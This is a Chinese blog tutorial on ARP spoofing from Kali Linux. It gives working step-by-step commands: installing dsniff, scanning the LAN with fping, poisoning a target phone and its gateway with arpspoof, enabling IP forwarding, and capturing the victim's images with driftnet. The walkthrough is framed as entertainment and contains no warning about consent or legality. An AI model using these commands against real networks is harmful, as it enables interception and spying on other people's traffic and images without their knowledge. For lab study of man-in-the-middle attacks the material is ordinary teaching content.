• Kali实现ARP欺骗


    目录

    一、什么是ARP欺骗

    二、虚拟机网络连接的3种模式

    三、实现ARP欺骗

    1.ARP欺骗需要用到dsniff数据包

    2.通过以下命令确定你的网卡名称和IP地址: 

    3.嗅探你所在WLAN下所有设备的IP地址,命令如下:

    4.使用root权限使用以下命令攻击

    四、设置转发

    五、driftnet图片截取


    一、什么是ARP欺骗

    ARP欺骗(ARP spoofing),又称ARP毒化(ARP poisoning,网络上多译为ARP病毒)或ARP攻击,是针对以太网地址解析协议ARP)的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网络上特定计算机或所有计算机无法正常连线。

    二、虚拟机网络连接的3种模式

    桥接模式:相当于在物理主机与虚拟机网卡之间架设了一座桥梁,从而可以通过物理主机的网卡访问外网。
    NAT 模式:让 VM 虚拟机的网络服务发挥路由器的作用,使得通过虚拟机软件模拟的主机可以通过物理主机访问外网,在真机中 NAT 虚拟机网卡对应的物理网卡是VMnet8
    仅主机模式:仅让虚拟机内的主机与物理主机通信,不能访问外网,在真机中仅主机模式模拟网卡对应的物理网卡是 VMnet1​

    三、实现ARP欺骗

    1.ARP欺骗需要用到dsniff数据包

    (arpspoof 是 dsniff 的一个附属工具,所以我们需要安装的是 dsniff),安装命令如下:

    apt-get install dsniff
    

    2.通过以下命令确定你的网卡名称和IP地址: 

    ifconfig
    

    3.嗅探你所在WLAN下所有设备的IP地址,命令如下:

    fping -g 本机IP地址/24
    

    PS:例如我的IP是192.168.1.26,命令就是fping -g 192.168.1.26/24找到目标IP(Windows如果启动防火墙找不到)

    4.使用root权限使用以下命令攻击

    sudo su 启动root权限

    arpspoof -i 你的网卡名称 -t 攻击目标的IP地址 攻击目标的网关地址
    

     PS:网卡名称的查看上文已经提过,我以我的网卡为例,名称是eth0,攻击目标就是我的手机,IP是192.168.1.25,手机的网关就是192.168.1.1(就是IP的最后一位改为1),于是我的攻击命令就是:

    arpspoof -i eth0 -t 192.168.1.25 192.168.1.1
    

    最后手机虽然可以上网,但网速很慢,这就说明我们的ARP欺骗成功了。

    如果你想停止攻击,就按下Ctrl+Z,攻击就停止了。

    四、设置转发

    1. vim /etc/sysctl.conf   配置文件,将net.ipv4.ip_forward配置项取消掉“#”注释符号,并将其值由 0 改为 1 即可开启端口转发.

    2.在kali的root模式下输入

    1. echo 1 >> /proc/sys/net/ipv4/ip_forward
    2. cat /proc/sys/net/ipv4/ip_forward
    3. 1

    五、driftnet图片截取

    driftnet是一款简单而使用的图片捕获工具,可以很方便的在网络数据包中抓取图片,其使用语法: driftnet [options] [filter code]

    1. 主要参数:
    2. -b 捕获到新的图片时发声
    3. -d 指定保存图片的路径
    4. -x 指定保存图片的前缀名
    5. -i 选择监听接口
    6. -f 读取一个指定pcap数据包中的图片
    7. -a 后台模式:
    8. -m 指定保存图片数的数目

    PS:接着在 Kali 终端重新执行 arpspoof 命令(注意网关IP和主机IP顺序此时需要对换一下
    arpspoof -i eth0 -t 192.168.1.1(网关IP) 192.168.1.25(目标IP) 

    arpspoof -i eth0 -t 192.168.1.1 192.168.1.25

    打开另外一个终端并执行 driftnet -i eth0  命令,即可获取到目标主机的图片。

    注:像一些https://开头的网站基本上获取不了,即使获取到了也比较慢,没有参考价值,仅供娱乐)

  • 相关阅读:
    SpringBoot 整合多数据源
    刘二大人 PyTorch深度学习实践 笔记 P1 Overview
    删除数据库表中重复数据的方法
    D. Problem with Random Tests(暴力&贪心)
    Vim程序编辑器
    位图的基本原理以及应用
    【汇编】#5 80x86指令系统其一(数据传送与算术)
    嵌入式以太网硬件构成与MAC、PHY芯片功能介绍
    5分钟——快速搭建后端springboot项目
    ChatGPT:字符串操作问题——提取包含括号的字符串中的题干内容
  • 原文地址:https://blog.csdn.net/qq_51165234/article/details/128159119